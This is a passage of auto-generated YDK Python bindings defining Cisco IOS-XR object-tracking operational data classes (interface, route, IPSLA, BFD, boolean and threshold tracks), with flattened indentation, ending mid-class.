from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class Track(Enum):
"""
Track (Enum Class)
Track
.. data:: interface_type = 1
Line protocol type
.. data:: route_type = 2
Route type
.. data:: bool_and_type = 3
Boolean and type
.. data:: bool_or_type = 4
Boolean or type
.. data:: ipsla_type = 5
Ipsla track type
.. data:: undefined_type = 6
type undefined
.. data:: threshold_weight = 7
type threshold weight
.. data:: threshold_percentage = 8
type threshold percentage
.. data:: bfd_type = 9
type bfd rtr
"""
interface_type = Enum.YLeaf(1, "interface-type")
route_type = Enum.YLeaf(2, "route-type")
bool_and_type = Enum.YLeaf(3, "bool-and-type")
bool_or_type = Enum.YLeaf(4, "bool-or-type")
ipsla_type = Enum.YLeaf(5, "ipsla-type")
undefined_type = Enum.YLeaf(6, "undefined-type")
threshold_weight = Enum.YLeaf(7, "threshold-weight")
threshold_percentage = Enum.YLeaf(8, "threshold-percentage")
bfd_type = Enum.YLeaf(9, "bfd-type")
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['Track']
class ObjectTracking(_Entity_):
"""
Object Tracking operational data
.. attribute:: track_type_interface
Object Tracking Type interface info
**type**\: :py:class:`TrackTypeInterface <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface>`
**config**\: False
.. attribute:: track_briefs
Object Tracking Track table brief
**type**\: :py:class:`TrackBriefs <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackBriefs>`
**config**\: False
.. attribute:: track_type_rtr_reachability
Object Tracking Type RTR Reachability info
**type**\: :py:class:`TrackTypeRtrReachability <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachability>`
**config**\: False
.. attribute:: track_type_rtr_reachability_brief
Object Tracking Type RTR Reachability brief info
**type**\: :py:class:`TrackTypeRtrReachabilityBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeRtrReachabilityBrief>`
**config**\: False
.. attribute:: tracks
Object Tracking Track table
**type**\: :py:class:`Tracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.Tracks>`
**config**\: False
.. attribute:: track_type_ipv4_route_brief
Object Tracking Type Ipv4 Route brief info
**type**\: :py:class:`TrackTypeIpv4RouteBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4RouteBrief>`
**config**\: False
.. attribute:: track_type_ipv4_route
Object Tracking Type IPV4 route info
**type**\: :py:class:`TrackTypeIpv4Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeIpv4Route>`
**config**\: False
.. attribute:: track_type_interface_brief
Object Tracking Type Interface brief info
**type**\: :py:class:`TrackTypeInterfaceBrief <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterfaceBrief>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking, self).__init__()
self._top_entity = None
self.yang_name = "object-tracking"
self.yang_parent_name = "Cisco-IOS-XR-manageability-object-tracking-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-interface", ("track_type_interface", ObjectTracking.TrackTypeInterface)), ("track-briefs", ("track_briefs", ObjectTracking.TrackBriefs)), ("track-type-rtr-reachability", ("track_type_rtr_reachability", ObjectTracking.TrackTypeRtrReachability)), ("track-type-rtr-reachability-brief", ("track_type_rtr_reachability_brief", ObjectTracking.TrackTypeRtrReachabilityBrief)), ("tracks", ("tracks", ObjectTracking.Tracks)), ("track-type-ipv4-route-brief", ("track_type_ipv4_route_brief", ObjectTracking.TrackTypeIpv4RouteBrief)), ("track-type-ipv4-route", ("track_type_ipv4_route", ObjectTracking.TrackTypeIpv4Route)), ("track-type-interface-brief", ("track_type_interface_brief", ObjectTracking.TrackTypeInterfaceBrief))])
self._leafs = OrderedDict()
self.track_type_interface = ObjectTracking.TrackTypeInterface()
self.track_type_interface.parent = self
self._children_name_map["track_type_interface"] = "track-type-interface"
self.track_briefs = ObjectTracking.TrackBriefs()
self.track_briefs.parent = self
self._children_name_map["track_briefs"] = "track-briefs"
self.track_type_rtr_reachability = ObjectTracking.TrackTypeRtrReachability()
self.track_type_rtr_reachability.parent = self
self._children_name_map["track_type_rtr_reachability"] = "track-type-rtr-reachability"
self.track_type_rtr_reachability_brief = ObjectTracking.TrackTypeRtrReachabilityBrief()
self.track_type_rtr_reachability_brief.parent = self
self._children_name_map["track_type_rtr_reachability_brief"] = "track-type-rtr-reachability-brief"
self.tracks = ObjectTracking.Tracks()
self.tracks.parent = self
self._children_name_map["tracks"] = "tracks"
self.track_type_ipv4_route_brief = ObjectTracking.TrackTypeIpv4RouteBrief()
self.track_type_ipv4_route_brief.parent = self
self._children_name_map["track_type_ipv4_route_brief"] = "track-type-ipv4-route-brief"
self.track_type_ipv4_route = ObjectTracking.TrackTypeIpv4Route()
self.track_type_ipv4_route.parent = self
self._children_name_map["track_type_ipv4_route"] = "track-type-ipv4-route"
self.track_type_interface_brief = ObjectTracking.TrackTypeInterfaceBrief()
self.track_type_interface_brief.parent = self
self._children_name_map["track_type_interface_brief"] = "track-type-interface-brief"
self._segment_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking, [], name, value)
class TrackTypeInterface(_Entity_):
"""
Object Tracking Type interface info
.. attribute:: track_info
track info
**type**\: list of :py:class:`TrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface, self).__init__()
self.yang_name = "track-type-interface"
self.yang_parent_name = "object-tracking"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-info", ("track_info", ObjectTracking.TrackTypeInterface.TrackInfo))])
self._leafs = OrderedDict()
self.track_info = YList(self)
self._segment_path = lambda: "track-type-interface"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface, [], name, value)
class TrackInfo(_Entity_):
"""
track info
.. attribute:: track_type_info
Track type information
**type**\: :py:class:`TrackTypeInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo>`
**config**\: False
.. attribute:: bool_tracks
boolean objects
**type**\: :py:class:`BoolTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks>`
**config**\: False
.. attribute:: threshold_tracks
Threshold objects
**type**\: :py:class:`ThresholdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks>`
**config**\: False
.. attribute:: tracking_interaces
Tracking Interfaces
**type**\: :py:class:`TrackingInteraces <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces>`
**config**\: False
.. attribute:: delayed
Is the state change delay counter in progress
**type**\: :py:class:`Delayed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.Delayed>`
**config**\: False
.. attribute:: tracke_name
Track Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: type
Track type
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: state_change_counter
State Change Counter
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seconds_last_change
Seconds Last Change
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
**units**\: second
.. attribute:: threshold_up
User specified threshold upper limit
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_down
User specified threshold lower limit
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo, self).__init__()
self.yang_name = "track-info"
self.yang_parent_name = "track-type-interface"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("track-type-info", ("track_type_info", ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo)), ("bool-tracks", ("bool_tracks", ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks)), ("threshold-tracks", ("threshold_tracks", ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks)), ("tracking-interaces", ("tracking_interaces", ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces)), ("delayed", ("delayed", ObjectTracking.TrackTypeInterface.TrackInfo.Delayed))])
self._leafs = OrderedDict([
('tracke_name', (YLeaf(YType.str, 'tracke-name'), ['str'])),
('type', (YLeaf(YType.enumeration, 'type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('state_change_counter', (YLeaf(YType.uint32, 'state-change-counter'), ['int'])),
('seconds_last_change', (YLeaf(YType.uint64, 'seconds-last-change'), ['int'])),
('threshold_up', (YLeaf(YType.uint32, 'threshold-up'), ['int'])),
('threshold_down', (YLeaf(YType.uint32, 'threshold-down'), ['int'])),
])
self.tracke_name = None
self.type = None
self.track_state = None
self.state_change_counter = None
self.seconds_last_change = None
self.threshold_up = None
self.threshold_down = None
self.track_type_info = ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo()
self.track_type_info.parent = self
self._children_name_map["track_type_info"] = "track-type-info"
self.bool_tracks = ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks()
self.bool_tracks.parent = self
self._children_name_map["bool_tracks"] = "bool-tracks"
self.threshold_tracks = ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks()
self.threshold_tracks.parent = self
self._children_name_map["threshold_tracks"] = "threshold-tracks"
self.tracking_interaces = ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces()
self.tracking_interaces.parent = self
self._children_name_map["tracking_interaces"] = "tracking-interaces"
self.delayed = ObjectTracking.TrackTypeInterface.TrackInfo.Delayed()
self.delayed.parent = self
self._children_name_map["delayed"] = "delayed"
self._segment_path = lambda: "track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo, ['tracke_name', 'type', 'track_state', 'state_change_counter', 'seconds_last_change', 'threshold_up', 'threshold_down'], name, value)
class TrackTypeInfo(_Entity_):
"""
Track type information
.. attribute:: interface_tracks
track type interface info
**type**\: :py:class:`InterfaceTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.InterfaceTracks>`
**config**\: False
.. attribute:: route_tracks
track type route info
**type**\: :py:class:`RouteTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.RouteTracks>`
**config**\: False
.. attribute:: ipsla_tracks
track type rtr info
**type**\: :py:class:`IpslaTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.IpslaTracks>`
**config**\: False
.. attribute:: bfd_tracks
track type bfdrtr info
**type**\: :py:class:`BfdTracks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.BfdTracks>`
**config**\: False
.. attribute:: discriminant
discriminant
**type**\: :py:class:`Track <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.Track>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo, self).__init__()
self.yang_name = "track-type-info"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracks", ("interface_tracks", ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.InterfaceTracks)), ("route-tracks", ("route_tracks", ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.RouteTracks)), ("ipsla-tracks", ("ipsla_tracks", ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.IpslaTracks)), ("bfd-tracks", ("bfd_tracks", ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.BfdTracks))])
self._leafs = OrderedDict([
('discriminant', (YLeaf(YType.enumeration, 'discriminant'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper', 'Track', '')])),
])
self.discriminant = None
self.interface_tracks = ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.InterfaceTracks()
self.interface_tracks.parent = self
self._children_name_map["interface_tracks"] = "interface-tracks"
self.route_tracks = ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.RouteTracks()
self.route_tracks.parent = self
self._children_name_map["route_tracks"] = "route-tracks"
self.ipsla_tracks = ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.IpslaTracks()
self.ipsla_tracks.parent = self
self._children_name_map["ipsla_tracks"] = "ipsla-tracks"
self.bfd_tracks = ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.BfdTracks()
self.bfd_tracks.parent = self
self._children_name_map["bfd_tracks"] = "bfd-tracks"
self._segment_path = lambda: "track-type-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo, ['discriminant'], name, value)
class InterfaceTracks(_Entity_):
"""
track type interface info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.InterfaceTracks, self).__init__()
self.yang_name = "interface-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
])
self.interface_name = None
self._segment_path = lambda: "interface-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.InterfaceTracks, ['interface_name'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.InterfaceTracks']['meta_info']
class RouteTracks(_Entity_):
"""
track type route info
.. attribute:: prefix
Prefix
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_length
Prefix Length
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: vrf
VRF Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: next_hop
Next Hop
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.RouteTracks, self).__init__()
self.yang_name = "route-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('prefix', (YLeaf(YType.uint32, 'prefix'), ['int'])),
('prefix_length', (YLeaf(YType.uint32, 'prefix-length'), ['int'])),
('vrf', (YLeaf(YType.str, 'vrf'), ['str'])),
('next_hop', (YLeaf(YType.str, 'next-hop'), ['str'])),
])
self.prefix = None
self.prefix_length = None
self.vrf = None
self.next_hop = None
self._segment_path = lambda: "route-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.RouteTracks, ['prefix', 'prefix_length', 'vrf', 'next_hop'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.RouteTracks']['meta_info']
class IpslaTracks(_Entity_):
"""
track type rtr info
.. attribute:: ipsla_op_id
Op Id
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rtt
Latest RTT
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code
Latest Return Code
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: return_code_string
Latest Ret Code String
**type**\: str
**length:** 0..120
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.IpslaTracks, self).__init__()
self.yang_name = "ipsla-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('ipsla_op_id', (YLeaf(YType.uint32, 'ipsla-op-id'), ['int'])),
('rtt', (YLeaf(YType.uint32, 'rtt'), ['int'])),
('return_code', (YLeaf(YType.uint32, 'return-code'), ['int'])),
('return_code_string', (YLeaf(YType.str, 'return-code-string'), ['str'])),
])
self.ipsla_op_id = None
self.rtt = None
self.return_code = None
self.return_code_string = None
self._segment_path = lambda: "ipsla-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.IpslaTracks, ['ipsla_op_id', 'rtt', 'return_code', 'return_code_string'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.IpslaTracks']['meta_info']
class BfdTracks(_Entity_):
"""
track type bfdrtr info
.. attribute:: interface_name
Interface Name
**type**\: str
**length:** 0..120
**config**\: False
.. attribute:: destination_address
Destination Address
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: rate
Rate
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: debounce_count
Debounce Count
**type**\: int
**range:** 0..4294967295
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.BfdTracks, self).__init__()
self.yang_name = "bfd-tracks"
self.yang_parent_name = "track-type-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('interface_name', (YLeaf(YType.str, 'interface-name'), ['str'])),
('destination_address', (YLeaf(YType.uint32, 'destination-address'), ['int'])),
('rate', (YLeaf(YType.uint32, 'rate'), ['int'])),
('debounce_count', (YLeaf(YType.uint32, 'debounce-count'), ['int'])),
])
self.interface_name = None
self.destination_address = None
self.rate = None
self.debounce_count = None
self._segment_path = lambda: "bfd-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/track-type-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.BfdTracks, ['interface_name', 'destination_address', 'rate', 'debounce_count'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo.BfdTracks']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.TrackTypeInfo']['meta_info']
class BoolTracks(_Entity_):
"""
boolean objects
.. attribute:: bool_track_info
bool track info
**type**\: list of :py:class:`BoolTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks.BoolTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks, self).__init__()
self.yang_name = "bool-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("bool-track-info", ("bool_track_info", ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks.BoolTrackInfo))])
self._leafs = OrderedDict()
self.bool_track_info = YList(self)
self._segment_path = lambda: "bool-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks, [], name, value)
class BoolTrackInfo(_Entity_):
"""
bool track info
.. attribute:: object_name
Object Name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state
**type**\: bool
**config**\: False
.. attribute:: with_not
Track object with Not
**type**\: bool
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks.BoolTrackInfo, self).__init__()
self.yang_name = "bool-track-info"
self.yang_parent_name = "bool-tracks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('with_not', (YLeaf(YType.boolean, 'with-not'), ['bool'])),
])
self.object_name = None
self.track_state = None
self.with_not = None
self._segment_path = lambda: "bool-track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/bool-tracks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks.BoolTrackInfo, ['object_name', 'track_state', 'with_not'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks.BoolTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.BoolTracks']['meta_info']
class ThresholdTracks(_Entity_):
"""
Threshold objects
.. attribute:: threshold_track_info
threshold track info
**type**\: list of :py:class:`ThresholdTrackInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks.ThresholdTrackInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks, self).__init__()
self.yang_name = "threshold-tracks"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("threshold-track-info", ("threshold_track_info", ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks.ThresholdTrackInfo))])
self._leafs = OrderedDict()
self.threshold_track_info = YList(self)
self._segment_path = lambda: "threshold-tracks"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks, [], name, value)
class ThresholdTrackInfo(_Entity_):
"""
threshold track info
.. attribute:: object_name
Object name
**type**\: str
**length:** 0..33
**config**\: False
.. attribute:: track_state
Track state. True means track is up; False means track is down
**type**\: bool
**config**\: False
.. attribute:: weight
Weight is the number assigned to a track object . In case of a type threshold weight( i.e. weighted sum list), weight is asigned by User at the time of configuration. In case of a type threshold percentage (i.e. percentage based list), weight is internally computed by (1/N)x100, where N is the number of objects in the list
**type**\: int
**range:** 0..4294967295
**config**\: False
**units**\: percentage
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks.ThresholdTrackInfo, self).__init__()
self.yang_name = "threshold-track-info"
self.yang_parent_name = "threshold-tracks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('object_name', (YLeaf(YType.str, 'object-name'), ['str'])),
('track_state', (YLeaf(YType.boolean, 'track-state'), ['bool'])),
('weight', (YLeaf(YType.uint32, 'weight'), ['int'])),
])
self.object_name = None
self.track_state = None
self.weight = None
self._segment_path = lambda: "threshold-track-info"
self._absolute_path = lambda: "Cisco-IOS-XR-manageability-object-tracking-oper:object-tracking/track-type-interface/track-info/threshold-tracks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks.ThresholdTrackInfo, ['object_name', 'track_state', 'weight'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks.ThresholdTrackInfo']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_manageability_object_tracking_oper as meta
return meta._meta_table['ObjectTracking.TrackTypeInterface.TrackInfo.ThresholdTracks']['meta_info']
class TrackingInteraces(_Entity_):
"""
Tracking Interfaces
.. attribute:: interface_tracking_info
interface tracking info
**type**\: list of :py:class:`InterfaceTrackingInfo <ydk.models.cisco_ios_xr.Cisco_IOS_XR_manageability_object_tracking_oper.ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces.InterfaceTrackingInfo>`
**config**\: False
"""
_prefix = 'manageability-object-tracking-oper'
_revision = '2015-11-09'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces, self).__init__()
self.yang_name = "tracking-interaces"
self.yang_parent_name = "track-info"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("interface-tracking-info", ("interface_tracking_info", ObjectTracking.TrackTypeInterface.TrackInfo.TrackingInteraces.InterfaceTrackingInfo))])
self._leafs = OrderedDict()
self.interface_tracking_info = YList(self)
self._segment_path = lambda: "tracking-interaces"
